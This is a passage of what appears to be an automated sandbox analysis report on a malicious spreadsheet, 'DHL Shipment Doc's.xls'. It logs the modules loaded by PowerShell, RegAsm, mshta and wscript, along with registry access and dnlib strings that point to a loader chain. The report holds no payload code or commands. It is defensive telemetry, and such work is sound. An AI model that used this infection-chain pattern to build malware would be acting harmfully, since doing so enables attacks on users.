                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll
                    Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: DHL Shipment Doc's.xlsStatic file information: File size 1095168 > 1048576
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.476880205.000007FE89A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.478544858.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.497351507.000007FE89C53000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.pdb source: powershell.exe, 00000019.00000002.473447172.0000000002E60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qjwmez35\qjwmez35.pdbhP source: powershell.exe, 00000019.00000002.473447172.0000000002E60000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\00kppfao\00kppfao.pdb source: powershell.exe, 00000007.00000002.433523996.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.476880205.000007FE89A88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.478544858.000007FE89C30000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.497351507.000007FE89C53000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.471794354.000000001C780000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.457736519.000000001317D000.00000004.00000800.00020000.00000000.sdmp
